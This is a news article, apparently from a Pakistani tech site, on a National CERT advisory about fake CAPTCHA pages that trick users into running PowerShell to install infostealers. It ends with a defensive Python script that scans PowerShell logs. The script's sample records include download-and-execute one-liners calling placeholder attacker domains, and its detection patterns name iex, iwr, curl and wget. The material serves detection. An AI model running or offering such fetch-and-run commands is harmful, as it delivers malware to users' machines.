NCERT Warns Fake CAPTCHA Pages Exploit PowerShell to Hack Windows

The National Computer Emergency Response Team (National CERT) has issued a cybersecurity advisory warning of a new malware campaign leveraging fake CAPTCHA verification pages to deceive users.

Dubbed “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” the advisory details how cybercriminals are exploiting social engineering techniques to trick users into compromising their systems. The attack has already targeted users within the region, with a specific focus on those seeking free online content.

According to the advisory, threat actors redirect users to malicious websites disguised as platforms offering free media, where they are prompted to complete a CAPTCHA verification. Once users interact with the fraudulent CAPTCHA, a malicious script is copied to their clipboard, which they are tricked into executing. The attack primarily leverages PowerShell to download additional malware onto the victim’s system. This malware can include information-stealing tools and network scanners that facilitate further exploitation.

The attack begins when users are redirected to fake CAPTCHA pages designed to mimic legitimate verification processes. Upon interacting with the CAPTCHA, users inadvertently execute harmful PowerShell scripts that download and run malicious files from an attacker’s server. Key indicators of compromise (IOCs) include several malicious URLs and file hashes, which the advisory urges organizations to monitor and block immediately.

According to the National CERT, this campaign allows attackers to install various malware types, such as infostealers and network scanners, which enable lateral movement within compromised networks. The malicious PowerShell commands can bypass traditional security defenses, making it crucial for organizations to implement enhanced security measures, such as robust endpoint protection and detailed PowerShell logging.

The National CERT recommends several immediate preventive actions, including educating users about the risks of social engineering tactics, particularly those involving copying and pasting unknown commands. Additionally, organizations should continuously monitor network traffic for suspicious connections and enable PowerShell logging to detect unauthorized activity.

The advisory suggests implementing multi-factor authentication (MFA), restricting privileged access, and deploying endpoint detection and response (EDR) solutions to mitigate the risk of these attacks. Organizations are also urged to block all identified malicious domains and URLs to prevent further compromise.
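The detection advice above (enable PowerShell logging, watch for suspicious network connections, block the listed domains) can be turned into a simple triage check. The script below is an added example written for this article; it is not code from the National CERT advisory, and the event records, user names and domains in it are constructed placeholders rather than the advisory's IOCs. It models exported PowerShell script block records (Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log) and flags the pattern this campaign relies on: a one-liner that downloads content and immediately executes it, often with a hidden window, reaching out to a known-bad domain.

```python
"""Triage PowerShell script block log records for fake-CAPTCHA style activity.

Example code for this article, not the advisory's own tooling. Records are
constructed to resemble Event ID 4104 (script block logging) exports; the
domains below are placeholders standing in for an organisation's blocklist.
"""
import re
from dataclasses import dataclass

# Constructed sample records: one benign file listing, one download-and-run
# one-liner, one benign AD query, one hidden-window download-and-run.
SAMPLE_EVENTS = [
    {"id": 4104, "user": "DESKTOP-1\\alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 4104, "user": "DESKTOP-1\\alice",
     "script": "$r = Invoke-WebRequest 'https://cdn.example.invalid/stage1.txt'; "
               "Invoke-Expression $r.Content"},
    {"id": 4104, "user": "DESKTOP-1\\bob",
     "script": "Import-Module ActiveDirectory; Get-ADUser -Filter *"},
    {"id": 4104, "user": "DESKTOP-1\\carol",
     "script": "powershell -w hidden -c \"iex (iwr -useb "
               "http://free-movies.example.invalid/verify)\""},
]

# Placeholder blocklist; in practice this is the advisory's domain/URL list.
BLOCKED_DOMAINS = {"cdn.example.invalid", "free-movies.example.invalid"}

# Execution primitives and download primitives; a script block that contains
# one of each is the classic "fetch a second stage and run it" pattern.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl|wget)\b",
    re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


@dataclass
class Finding:
    user: str
    reasons: list   # which heuristics fired, in a fixed order
    blocked: list   # blocklisted domains referenced by the script block


def analyze_script(script: str, blocklist: set) -> tuple:
    """Return (reasons, blocked_domains) for one script block."""
    reasons = []
    if EXEC_RE.search(script) and DOWNLOAD_RE.search(script):
        reasons.append("download_and_execute")
    if HIDDEN_RE.search(script):
        reasons.append("hidden_window")
    if ENCODED_RE.search(script):
        reasons.append("encoded_command")
    domains = [d.lower() for d in URL_RE.findall(script)]
    blocked = [d for d in domains if d in blocklist]
    if blocked:
        reasons.append("blocked_domain")
    return reasons, blocked


def scan(events: list, blocklist: set) -> list:
    """Run the heuristics over script block records; return only the hits."""
    findings = []
    for event in events:
        if event.get("id") != 4104:      # only script block logging records
            continue
        reasons, blocked = analyze_script(event["script"], blocklist)
        if reasons:
            findings.append(Finding(event["user"], reasons, blocked))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, BLOCKED_DOMAINS):
        print(f"{f.user}: {', '.join(f.reasons)}"
              + (f" (domains: {', '.join(f.blocked)})" if f.blocked else ""))
```

Script block logging has to be enabled before any of these records exist, which is the point of the advisory's logging recommendation: without it the one-liner a user pastes from the clipboard leaves no PowerShell trace to search. The blocklist match is the cheapest and most reliable signal, so keep it in step with the advisory's IOC list; the download-and-execute and hidden-window heuristics catch variants that move to new infrastructure but keep the same delivery shape.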

Published by
ProPK Staff